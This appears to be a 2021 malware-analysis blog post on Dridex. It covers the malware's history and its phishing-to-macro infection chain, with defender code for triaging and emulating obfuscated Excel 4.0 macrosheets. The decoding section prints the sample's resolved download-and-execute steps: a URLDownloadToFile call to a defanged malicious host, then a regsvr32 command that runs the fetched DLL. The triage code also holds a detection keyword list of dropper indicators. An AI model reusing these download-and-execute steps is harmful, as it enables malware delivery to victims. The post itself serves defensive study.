Dridex crimeware/malware

Malware APT
Dridex, Indrik Spider, Evil Corp

Dridex

An evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet; if the malware cannot reach one server, it will try another. For this reason, network-based measures such as blocking the C&C IPs are effective only in the short term. – OxCERT

History

From the Treasury press release "Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware": "As of 2015, Yakubets maintained control of the Dridex malware."

  • Dridex first appeared on the charts in June 2014.
  • It then started building its army of botnets (mid 2014 to mid 2015).
  • The botnet was taken down by the USA in late 2015.
  • It resurfaced in 2016 and assembled more than 30 botnets.
  • By mid July 2017 Dridex had started delivering ransomware infections, the likes of BitPaymer, DoppelPaymer and WastedLocker.

Fun fact: botnets are named after their botnet IDs, like 10111, 40200, 40300 etc.

Mechanism

Malspam (email) -> Maldoc (Excel/Word) + macro -> VBA macro -> PowerShell script -> payload download -> payload execution

Mostly the maldocs are Excel documents, and the URLs are obfuscated as cell contents. A VBA function then de-obfuscates the sheet and downloads the payload, either using PowerShell or the Windows API (mostly PowerShell).

Sample used: f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e (maldoc, thanks to abuse.ch)

Initial Access :

Phishing:

    Spearphishing Attachment: compressed macro docs, PDFs, JS, JAR, etc.
    Spearphishing Link: link to the above compressed files (mostly compromised sites and public cloud storage are used)

Execution:

Command and Scripting Interpreter:

    Macro
    PowerShell

Use olevba3 to extract the macrosheet, or use openpyxl to get the cell contents.

This sample uses XLM macrosheets, which are still there (for 30 years, if I am not wrong) to support backward compatibility; nowadays VBA macros are used instead of macrosheets. In an xls macrosheet, execution goes from left to right and from top to bottom cell. All sheets are hidden, and the sheets are heavily obfuscated.

Code to get cell contents:

import openpyxl

book = openpyxl.load_workbook('binary.xlsm')
for sheet in book.worksheets:              # iterate directly; get_sheet_by_name() is deprecated
    for row in sheet.rows:
        for cell in row:
            if cell.value is not None:     # skip empty cells
                print(cell.coordinate, cell.value)

Keywords

  • FORMULA.FILL: puts data or a formula into a cell.
      FORMULA.FILL('Doc2'!AP94&'Doc1'!AW54&'Doc1'!AY54&'Doc1'!AV68&'Doc1'!AX68&'Doc1'!AZ68&".html",'Doc1'!AM23)
  • WORKBOOK.HIDE: hides the sheets.
      WORKBOOK.HIDE("Doc1",1)
  • SET.VALUE: sets the value of a cell.
      SET.VALUE(AM19,AV39&'Doc1'!AV40&'Doc1'!AV41&'Doc1'!AV42&'Doc1'!AV43)
  • CALL: in a macrosheet you can call functions from a cell :) You can even call a DLL function using CALL (urlmon.urldownloadtofile()).
      CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&".dll",0,0)
  • EXEC: executes the command provided as its argument.
      EXEC(AM34&AO15)
  • &: just concatenates strings.
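As an added example that is not code from the original post, here is a small triage pass a defender can run over a cell dump to flag the keyword functions above (and hidden sheets) before starting the manual decoding. The dump is constructed for the example in the (sheet, sheet state, coordinate, value) shape the openpyxl loop produces; its cell addresses and URL fragment are made up, and the scoring weights and thresholds are assumptions.

```python
import re

# Constructed cell dump in the shape the openpyxl loop yields, extended with the
# sheet state: (sheet, sheet_state, coordinate, value). Formulas are modelled on
# the post's trace; the URL fragment is a placeholder.
SAMPLE_CELLS = [
    ("Doc1", "veryHidden", "AO20", "=EXEC(AM34&AO15)"),
    ("Doc1", "veryHidden", "AO73", "regsvr32 -s "),
    ("Doc1", "veryHidden", "AV39", "=CHAR(85)"),
    ("Doc1", "veryHidden", "AM19", "=SET.VALUE(AM19,AV39&'Doc1'!AV40&'Doc1'!AV41)"),
    ("Doc1", "veryHidden", "AM23", "=FORMULA.FILL('Doc2'!AP94&'Doc1'!AW54&\".html\",'Doc1'!AM23)"),
    ("Doc1", "veryHidden", "AO21",
     "=CALL('Doc1'!AM19&\"n\",'Doc1'!AM20&\"A\",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&\".dll\",0,0)"),
    ("Doc2", "hidden", "AP94", "http://"),
    ("Sheet1", "visible", "A1", "Enable editing to view this document"),
]

# Weights are assumptions for the example: functions that call into DLLs or run
# commands score highest; the data-shuffling ones that build strings score lower.
SUSPICIOUS_FUNCS = {
    "CALL": 5, "EXEC": 5, "REGISTER": 5,
    "FORMULA.FILL": 2, "FORMULA": 2, "SET.VALUE": 2, "WORKBOOK.HIDE": 2, "CHAR": 1,
}
SUSPICIOUS_STRINGS = ("regsvr32", "rundll32", "powershell", "urlmon", "urldownloadtofile", "http")
FUNC_RE = re.compile(r"(?<![A-Z0-9.])([A-Z][A-Z0-9.]*)\(")   # function name followed by "("


def scan_cell(value):
    """Return (points, reasons) for one cell value; 0 points means nothing flagged."""
    if not isinstance(value, str):
        return 0, []
    points, reasons = 0, []
    if value.startswith("="):
        for func in FUNC_RE.findall(value.upper()):
            if func in SUSPICIOUS_FUNCS:
                points += SUSPICIOUS_FUNCS[func]
                reasons.append(func)
    for needle in SUSPICIOUS_STRINGS:
        if needle in value.lower():
            points += 3
            reasons.append("string:" + needle)
    return points, reasons


def triage(cells):
    """Score a whole dump and return the evidence, so an analyst can decide quickly."""
    score, findings = 0, []
    for sheet, _state, coord, value in cells:
        points, reasons = scan_cell(value)
        if points:
            score += points
            findings.append((f"{sheet}!{coord}", reasons))
    hidden = sorted({sheet for sheet, state, _, _ in cells if state != "visible"})
    score += 2 * len(hidden)            # hidden / veryHidden sheets are a tell on their own
    if score >= 10:
        verdict = "likely XLM dropper"
    elif score >= 4:
        verdict = "suspicious"
    else:
        verdict = "nothing flagged"
    return {"score": score, "verdict": verdict, "hidden_sheets": hidden, "findings": findings}


if __name__ == "__main__":
    report = triage(SAMPLE_CELLS)
    print(report["verdict"], report["score"], report["hidden_sheets"])
    for where, reasons in report["findings"]:
        print(" ", where, ", ".join(reasons))
```

On the constructed dump this reports "likely XLM dropper" with both Doc1 and Doc2 hidden and the CALL/EXEC cells listed first among the findings; a plain workbook with ordinary formulas such as SUM stays at "nothing flagged". The per-cell reasons are what you want in a ticket, since they point straight at the cells to decode next.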

Demo sequence:

    decode the CALL URLs
    decode the CALL function
    run the downloaded dll

    <Cell u'Doc1'.AO20> =EXEC(AM34&AO15) = regsvr32 -s ..\ghnrope
    AM34 = SET.VALUE(AM34,AO73)
        AO73 = <Cell u'Doc1'.AO73> ="regsvr32 -s "
    <Cell u'Doc1'.AO15> ="..\ghnrope"
    CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&".dll",0,0)
    AM19 = SET.VALUE(AM19,AV39&'Doc1'!AV40&'Doc1'!AV41&'Doc1'!AV42&'Doc1'!AV43) = URLMo
        <Cell u'Doc1'.AV39> =CHAR(85)
        <Cell u'Doc1'.AV40> R
        <Cell u'Doc1'.AV41> L
        <Cell u'Doc1'.AV42> M
        <Cell u'Doc1'.AV43> o
    AM20 = SET.VALUE(AM20,'Doc2'!AQ74&'Doc2'!AQ75&'Doc2'!AQ76&'Doc2'!AQ77&'Doc2'!AQ78&'Doc2'!AQ79&'Doc2'!AQ80&'Doc2'!AQ81&'Doc2'!AQ82&'Doc2'!AQ83&'Doc2'!AQ84&'Doc2'!AQ85&'Doc2'!AQ86&'Doc2'!AQ87&'Doc2'!AQ88&'Doc2'!AQ89&'Doc2'!AQ90)
        similarly as above: URLDownloadToFile
    AM30 = SET.VALUE(AM30,'Doc2'!AR74&'Doc2'!AR75&'Doc2'!AR76&'Doc2'!AR77&'Doc2'!AR78&'Doc2'!AR79)
        AM30 = JJCCBB
    AR84 = 0
    AM23 = FORMULA.FILL('Doc2'!AP94&'Doc1'!AW54&'Doc1'!AY54&'Doc1'!AV68&'Doc1'!AX68&'Doc1'!AZ68&".html",'Doc1'!AM23)
        AM23 = http[:]//runolfsson-jayde07s.ru.com/ind[.]html
    AO15 = ..\ghnrope

CALL("URLMo"&"n","URLDownloadToFile"&"A",JJCCBB,0,"http[:]//runolfsson-jayde07s.ru.com/ind[.]html","..\ghnrope"&".dll")
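The decoding walk-through above can be automated for this formula subset. The following is an added example, not the author's tooling: a small evaluator for SET.VALUE, FORMULA.FILL, CHAR and & that resolves cell references lazily and records the arguments of CALL and EXEC instead of executing anything. The cell map is constructed from the post's trace (the one-character-per-cell strings, the self-writing AM19/AM20/AM30/AM23/AM34 cells); the macro entry cells AB1/AB2 and the host name example.invalid are placeholders, not the sample's values.

```python
import re

# Tokens of the formula subset: "strings", integers, [sheet!]cell refs, function names
# (followed by "("), and the operators & ( ) ,
TOKEN_RE = re.compile(r"""\s*(?:(?P<str>"[^"]*")|(?P<num>\d+)
    |(?P<ref>(?:'[^']+'!|\w+!)?\$?[A-Z]{1,3}\$?\d+)|(?P<func>[A-Z][A-Z0-9.]*)(?=\()
    |(?P<op>[(),&]))""", re.VERBOSE)


class XlmEmulator:
    """Lazy evaluator for the Excel 4.0 macro subset in the dropper; CALL/EXEC are only recorded."""

    def __init__(self, cells):
        self.cells, self.events = dict(cells), []      # cells: {(sheet, coord): value}

    def value(self, sheet, coord):
        raw = self.cells.get((sheet, coord), "")
        return self.evaluate(raw[1:], sheet) if isinstance(raw, str) and raw.startswith("=") else raw

    def evaluate(self, formula, sheet):
        toks = [(m.lastgroup, m.group(m.lastgroup)) for m in TOKEN_RE.finditer(formula)]
        pos = [0]                                        # boxed so the closures can advance it

        def take():
            pos[0] += 1
            return toks[pos[0] - 1]

        def peek():
            return toks[pos[0]] if pos[0] < len(toks) else (None, None)

        def ref(text):                                   # "'Doc2'!AQ74" -> ("Doc2", "AQ74")
            sh, _, coord = text.rpartition("!")
            return (sh.strip("'") or sheet, coord.replace("$", ""))

        def expr():                                      # expr := term ('&' term)*
            left = term()
            while peek() == ("op", "&"):
                take()
                left = str(left) + str(term())
            return left

        def term():
            kind, text = take()
            if kind == "ref":                            # reading a cell evaluates it lazily
                return self.value(*ref(text))
            if kind == "func":
                return call(text)
            return text[1:-1] if kind == "str" else int(text)

        def call(name):
            take()                                       # "("
            if name in ("SET.VALUE", "FORMULA.FILL"):    # (target, value) / (value, target)
                a = ref(take()[1]) if name == "SET.VALUE" else expr()
                take()                                   # ","
                b = expr() if name == "SET.VALUE" else ref(take()[1])
                take()                                   # ")"
                target, val = (a, b) if name == "SET.VALUE" else (b, a)
                self.cells[target] = val                 # the write-back the real macro does
                return val
            args = [expr()]
            while peek() == ("op", ","):
                take()
                args.append(expr())
            take()                                       # ")"
            if name == "CHAR":
                return chr(args[0])
            if name not in ("CALL", "EXEC"):
                raise ValueError(f"unsupported function {name}")
            self.events.append((name, args))             # recorded, never executed
            return ""

        return expr()

    def run_column(self, sheet, start):                  # XLM steps down the column from the entry cell
        col, row = re.match(r"([A-Z]+)(\d+)", start).groups()
        row = int(row)
        while (sheet, f"{col}{row}") in self.cells:
            self.value(sheet, f"{col}{row}")
            row += 1
        return self.events


# Constructed cell map modelled on the post's trace; the host name is a placeholder.
CELLS = {
    ("Doc1", "AV39"): "=CHAR(85)", ("Doc1", "AV40"): "R", ("Doc1", "AV41"): "L",
    ("Doc1", "AV42"): "M", ("Doc1", "AV43"): "o", ("Doc2", "AR84"): 0,
    ("Doc1", "AO73"): "regsvr32 -s ", ("Doc1", "AO15"): "..\\ghnrope",
    ("Doc2", "AP94"): "http://", ("Doc1", "AW54"): "example", ("Doc1", "AY54"): ".invalid",
    ("Doc1", "AV68"): "/", ("Doc1", "AX68"): "in", ("Doc1", "AZ68"): "d",
    **{("Doc2", f"AQ{74 + i}"): c for i, c in enumerate("URLDownloadToFile")},
    **{("Doc2", f"AR{74 + i}"): c for i, c in enumerate("JJCCBB")},
    # self-writing cells, as the post describes them (AM19 = SET.VALUE(AM19, ...))
    ("Doc1", "AM19"): "=SET.VALUE(AM19,AV39&'Doc1'!AV40&'Doc1'!AV41&'Doc1'!AV42&'Doc1'!AV43)",
    ("Doc1", "AM20"): "=SET.VALUE(AM20," + "&".join(f"'Doc2'!AQ{r}" for r in range(74, 91)) + ")",
    ("Doc1", "AM30"): "=SET.VALUE(AM30," + "&".join(f"'Doc2'!AR{r}" for r in range(74, 80)) + ")",
    ("Doc1", "AM23"): "=FORMULA.FILL('Doc2'!AP94&'Doc1'!AW54&'Doc1'!AY54&'Doc1'!AV68"
                      "&'Doc1'!AX68&'Doc1'!AZ68&\".html\",'Doc1'!AM23)",
    ("Doc1", "AM34"): "=SET.VALUE(AM34,AO73)",
    # macro entry column (its location is constructed): the CALL, then the EXEC
    ("Doc1", "AB1"): "=CALL('Doc1'!AM19&\"n\",'Doc1'!AM20&\"A\",'Doc1'!AM30,'Doc2'!AR84,"
                     "'Doc1'!AM23,'Doc1'!AO15&\".dll\",0,0)",
    ("Doc1", "AB2"): "=EXEC(AM34&AO15)",
}


def recover(cells=CELLS, sheet="Doc1", entry="AB1"):
    """Run the macro column and render each recorded call like the resolved CALL line above."""
    def quote(arg):
        return f'"{arg}"' if isinstance(arg, str) else str(arg)
    return [f"{name}({','.join(map(quote, args))})"
            for name, args in XlmEmulator(cells).run_column(sheet, entry)]
```

Calling recover() yields the same two resolved lines the manual walk-through ends with (URLMon / URLDownloadToFileA with the JJCCBB type string, then regsvr32 -s ..\ghnrope), only with the placeholder host. Because cell reads are lazy, the evaluator follows exactly the dependency chain an analyst follows by hand, and after the run the emulator's cells dict still holds the written-back strings (for example AM19 = "URLMo"), so the de-obfuscated sheet can be inspected as well.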

More reading: https://superuser.com/questions/1253212/what-is-macro-worksheet-in-excel

Written on March 2, 2021